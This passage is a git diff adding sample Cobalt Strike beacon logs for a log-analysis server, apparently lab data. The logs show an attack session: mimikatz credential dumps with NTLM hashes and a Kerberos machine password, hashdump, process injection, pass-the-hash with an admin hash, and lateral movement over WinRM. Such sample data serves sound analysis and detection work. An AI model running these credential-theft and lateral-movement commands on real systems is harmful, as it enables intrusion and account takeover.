+VFPlugin.exe 3340 3740 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 3740 3764 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 916 1420 x64 NT AUTHORITY\SYSTEM 0 +WmiPrvSE.exe 916 4140 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4744 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1168 4128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4444 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 5660 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3220 5292 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 5292 5344 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 6080 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 692 4980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 5308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 152 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 692 68 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 692 4244 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 3956 5484 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 3956 1688 x64 NT AUTHORITY\SYSTEM 2 +fontdrvhost.exe 1688 2108 x64 Font Driver Host\UMFD-2 2 +dwm.exe 1688 5416 x64 Window Manager\DWM-2 2 +rdpclip.exe 972 5620 x64 STROOP\W.Trommel 2 +sihost.exe 1476 5172 x64 STROOP\W.Trommel 2 +svchost.exe 692 2284 x64 STROOP\W.Trommel 2 +svchost.exe 692 5800 x64 STROOP\W.Trommel 2 +taskhostw.exe 1168 1932 x64 STROOP\W.Trommel 2 +svchost.exe 692 5580 x64 NT AUTHORITY\SYSTEM 0 +powershell.exe 1168 5472 x64 STROOP\W.Trommel 2 +svchost.exe 692 5364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4160 x64 NT AUTHORITY\SYSTEM 0 +ctfmon.exe 5364 4844 x64 STROOP\W.Trommel 2 +explorer.exe 4204 5992 x64 STROOP\W.Trommel 2 +svchost.exe 692 1776 x64 STROOP\W.Trommel 2 +conhost.exe 5472 6208 x64 STROOP\W.Trommel 2 +ShellExperienceHost.exe 916 6248 x64 STROOP\W.Trommel 2 +SearchUI.exe 916 6440 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6520 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6732 x64 STROOP\W.Trommel 2 +powershell.exe 5472 6976 x64 STROOP\W.Trommel 2 +conhost.exe 6976 6992 x64 STROOP\W.Trommel 2 +powershell.exe 5472 7112 x64 STROOP\W.Trommel 2 +conhost.exe 7112 7124 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 1380 x64 STROOP\W.Trommel 2 +iexplore.exe 916 2836 x64 STROOP\W.Trommel 2 +iexplore.exe 2836 6988 x86 STROOP\W.Trommel 2 +smartscreen.exe 916 7236 x64 STROOP\W.Trommel 2 +SecurityHealthSystray.exe 5992 7284 x64 STROOP\W.Trommel 2 +svchost.exe 692 7508 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 7396 x64 STROOP\W.Trommel 2 +dllhost.exe 916 8172 x64 STROOP\W.Trommel 2 +SearchProtocolHost.exe 68 6864 x64 STROOP\W.Trommel 2 +FlashUtil_ActiveX.exe 916 6096 x64 STROOP\W.Trommel 2 +wsmprovhost.exe 916 4164 x64 STROOP\W.Tax 0 +svchost.exe 692 6752 x64 NT AUTHORITY\SYSTEM 0 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 916 6740 x64 STROOP\W.Trommel 2 +audiodg.exe 2432 7244 x64 NT AUTHORITY\LOCAL SERVICE 0 +ApplicationFrameHost.exe 916 7764 x64 STROOP\W.Trommel 2 +svchost.exe 692 6056 x64 NT AUTHORITY\LOCAL SERVICE 0 +dllhost.exe 916 5816 x64 STROOP\W.Trommel 2 +svchost.exe 692 5288 x64 NT AUTHORITY\LOCAL SERVICE 0 +rundll32.exe 5880 7916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 864 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1168 3600 x64 STROOP\W.Trommel 2 +SearchFilterHost.exe 68 3416 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 7552 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:20:39 UTC [input] sleep 30s [from: Beacon 10.1.4.10@3284] +03/30 09:20:39 UTC [task] Tasked beacon to sleep for 30s +03/30 09:20:40 UTC [checkin] host called home, sent: 92 bytes +03/30 12:22:06 UTC [input] sleep 60 5 +03/30 12:22:06 UTC [task] Tasked beacon to sleep for 60s (5% jitter) +03/30 12:22:22 UTC [checkin] host called home, sent: 92 bytes diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log new file mode 100644 index 00000000..727afe24 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log @@ -0,0 +1,660 @@ +03/30 09:04:07 UTC [metadata] beacon_1282172642 -> 10.1.4.10; computer: L-WIN227; user: SYSTEM *; process: rundll32.exe; pid: 3284; os: Windows; version: 10.0; beacon arch: x64 (x64) +03/30 09:04:07 UTC [output] +established link to parent beacon: 10.1.3.11 + +03/30 09:04:16 UTC [input] logonpasswords +03/30 09:04:16 UTC [task] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command +03/30 09:04:17 UTC [checkin] host called home, sent: 417362 bytes +03/30 09:04:18 UTC [output] +received output: + +Authentication Id : 0 ; 1204847 (00000000:0012626f) +Session : RemoteInteractive from 2 +User Name : ADMIN-w.trommel +Domain : STROOP +Logon Server : S-WIN21 +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4731 + msv : + [00000003] Primary + * Username : ADMIN-W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : 084184796699243227158b41c2c4a96a + tspkg : + wdigest : + * Username : ADMIN-W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : ADMIN-W.Trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1200018 (00000000:00124f92) +Session : RemoteInteractive from 2 +User Name : ADMIN-w.trommel +Domain : STROOP +Logon Server : S-WIN21 +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4731 + msv : + [00000003] Primary + * Username : ADMIN-W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : 084184796699243227158b41c2c4a96a + tspkg : + wdigest : + * Username : ADMIN-W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : ADMIN-w.trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1171434 (00000000:0011dfea) +Session : Interactive from 2 +User Name : DWM-2 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-90-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 1170989 (00000000:0011de2d) +Session : Interactive from 2 +User Name : DWM-2 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-90-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 1170133 (00000000:0011dad5) +Session : Interactive from 2 +User Name : UMFD-2 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-96-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 997 (00000000:000003e5) +Session : Service from 0 +User Name : LOCAL SERVICE +Domain : NT AUTHORITY +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-19 + msv : + tspkg : + wdigest : + * Username : (null) + * Domain : (null) + * Password : (null) + kerberos : + * Username : (null) + * Domain : (null) + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 51952 (00000000:0000caf0) +Session : Interactive from 1 +User Name : DWM-1 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-90-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 51837 (00000000:0000ca7d) +Session : Interactive from 1 +User Name : DWM-1 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-90-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 996 (00000000:000003e4) +Session : Service from 0 +User Name : L-WIN227$ +Domain : STROOP +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-20 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : l-win227$ + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 29657 (00000000:000073d9) +Session : Interactive from 1 +User Name : UMFD-1 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-96-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 29612 (00000000:000073ac) +Session : Interactive from 0 +User Name : UMFD-0 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-96-0-0 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 28303 (00000000:00006e8f) +Session : UndefinedLogonType from 0 +User Name : (null) +Domain : (null) +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + kerberos : + ssp : + credman : + +Authentication Id : 0 ; 999 (00000000:000003e7) +Session : UndefinedLogonType from 0 +User Name : L-WIN227$ +Domain : STROOP +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-18 + msv : + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : l-win227$ + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + + +03/30 09:04:20 UTC [input] ps +03/30 09:04:20 UTC [task] Tasked beacon to list processes +03/30 09:04:23 UTC [checkin] host called home, sent: 12 bytes +03/30 09:04:23 UTC [output] +[System Process] 0 0 +System 0 4 x64 NT AUTHORITY\SYSTEM 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 492 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 492 588 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 580 596 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 580 684 x64 NT AUTHORITY\SYSTEM 1 +services.exe 588 696 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 588 732 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 588 844 x64 Font Driver Host\UMFD-0 0 +fontdrvhost.exe 684 852 x64 Font Driver Host\UMFD-1 1 +svchost.exe 696 920 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 968 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 684 584 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 684 652 x64 Window Manager\DWM-1 1 +svchost.exe 696 1008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1032 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1052 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1064 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1172 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1192 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1208 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1256 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1312 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1376 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1456 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1484 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1520 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1528 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1664 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1784 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1908 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1924 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1976 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1988 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1120 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2164 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 696 2200 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2224 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2252 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2300 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2380 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2392 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2516 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2532 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2548 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2612 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2628 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2868 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 696 3036 x64 NT AUTHORITY\SYSTEM 0 +OfficeClickToRun.exe 696 3156 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 696 3176 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3188 x64 NT AUTHORITY\NETWORK SERVICE 0 +WaAppAgent.exe 696 3196 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3204 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3216 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3224 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3232 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3256 x64 NT AUTHORITY\SYSTEM 0 +MsMpEng.exe 696 3288 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 696 3300 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 696 3348 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3376 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 3392 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 920 3728 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3928 x64 NT AUTHORITY\LOCAL SERVICE 0 +WmiPrvSE.exe 920 3312 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4320 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4744 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 4776 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1256 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2656 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 5428 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3196 6060 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 6060 6088 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1076 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 696 5940 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 6068 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5920 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 696 5636 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 696 4104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5788 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 5132 4300 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 5132 4592 x64 NT AUTHORITY\SYSTEM 2 +dwm.exe 4592 3272 x64 Window Manager\DWM-2 2 +fontdrvhost.exe 4592 5980 x64 Font Driver Host\UMFD-2 2 +rdpclip.exe 1032 5588 x64 STROOP\ADMIN-W.Trommel 2 +sihost.exe 1520 464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4388 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 1116 x64 STROOP\ADMIN-W.Trommel 2 +taskhostw.exe 1256 1748 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1256 1464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 5652 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 1464 1684 x64 STROOP\ADMIN-W.Trommel 2 +ctfmon.exe 5652 1060 x64 STROOP\ADMIN-W.Trommel 2 +explorer.exe 4684 4632 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 372 x64 STROOP\ADMIN-W.Trommel 2 +ShellExperienceHost.exe 920 6160 x64 STROOP\ADMIN-W.Trommel 2 +SearchUI.exe 920 6276 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 6908 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 6908 6916 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 7004 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 7004 7012 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 920 6376 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 6376 2320 x86 STROOP\ADMIN-W.Trommel 2 +smartscreen.exe 920 7204 x64 STROOP\ADMIN-W.Trommel 2 +SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 7532 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 4592 3888 x64 NT AUTHORITY\SYSTEM 2 +dllhost.exe 920 3128 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4552 x64 STROOP\ADMIN-W.Trommel 2 +rundll32.exe 7372 3284 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:04:25 UTC [input] hashdump +03/30 09:04:25 UTC [task] Tasked beacon to dump hashes +03/30 09:04:28 UTC [checkin] host called home, sent: 82501 bytes +03/30 09:04:28 UTC [input] screenshot +03/30 09:04:28 UTC [task] Tasked beacon to take screenshot +03/30 09:04:29 UTC [output] +received password hashes: +bofh:500:aad3b435b51404eeaad3b435b51404ee:e2fb4576f49d1badae64eeb8cd050e19::: +DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9480a886367fa07551dceadca7c741da::: + + +03/30 09:04:34 UTC [checkin] host called home, sent: 197186 bytes +03/30 09:06:30 UTC [input] inject 7248 x64 smb +03/30 09:06:30 UTC [task] Tasked beacon to inject windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) into 7248 (x64) +03/30 09:06:32 UTC [checkin] host called home, sent: 255034 bytes +03/30 09:06:33 UTC [output] +established link to child beacon: 10.1.4.10 + +03/30 09:10:36 UTC [input] rev2self +03/30 09:10:36 UTC [task] Tasked beacon to revert token +03/30 09:10:36 UTC [input] pth STROOP\ADMIN-W.Trommel e4a22d8e7bbec871b341c88c2e94cba2 +03/30 09:10:36 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:ADMIN-W.Trommel /domain:STROOP /ntlm:e4a22d8e7bbec871b341c88c2e94cba2 /run:"%COMSPEC% /c echo 9f46f427eed > \\.\pipe\461092" command +03/30 09:10:36 UTC [input] jump winrm64 S-WIN21 smb +03/30 09:10:37 UTC [task] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) on S-WIN21 via WinRM +03/30 09:10:39 UTC [checkin] host called home, sent: 636639 bytes +03/30 09:10:51 UTC [output] +Impersonated NT AUTHORITY\SYSTEM + +03/30 09:10:51 UTC [output] +established link to child beacon: 10.1.2.10 + +03/30 09:10:51 UTC [output] +received output: +user : ADMIN-W.Trommel +domain : STROOP +program : C:\windows\system32\cmd.exe /c echo 9f46f427eed > \\.\pipe\461092 +impers. : no +NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + | PID 8096 + | TID 2676 + | LSA Process is now R/W + | LUID 0 ; 2184206 (00000000:0021540e) + \_ msv1_0 - data copy @ 0000015374FA4E80 : OK ! + \_ kerberos - data copy @ 0000015374EF5418 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 0000015374E3F408 (32) -> null + + +03/30 09:10:51 UTC [output] +received output: +#< CLIXML + + +03/30 09:20:39 UTC [input] sleep 30 +03/30 09:20:39 UTC [task] <> Tasked beacon to sleep for 30s [change made to: Beacon 10.1.3.11@4164] +03/30 09:35:27 UTC [input] ps +03/30 09:35:27 UTC [task] Tasked beacon to list processes +03/30 09:35:43 UTC [checkin] host called home, sent: 36 bytes +03/30 09:35:43 UTC [output] +[System Process] 0 0 +System 0 4 x64 NT AUTHORITY\SYSTEM 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 492 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 492 588 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 580 596 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 580 684 x64 NT AUTHORITY\SYSTEM 1 +services.exe 588 696 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 588 732 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 588 844 x64 Font Driver Host\UMFD-0 0 +fontdrvhost.exe 684 852 x64 Font Driver Host\UMFD-1 1 +svchost.exe 696 920 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 968 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 684 584 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 684 652 x64 Window Manager\DWM-1 1 +svchost.exe 696 1008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1032 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1052 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1064 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1172 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1192 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1208 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1256 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1312 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1376 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1456 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1484 x64 NT 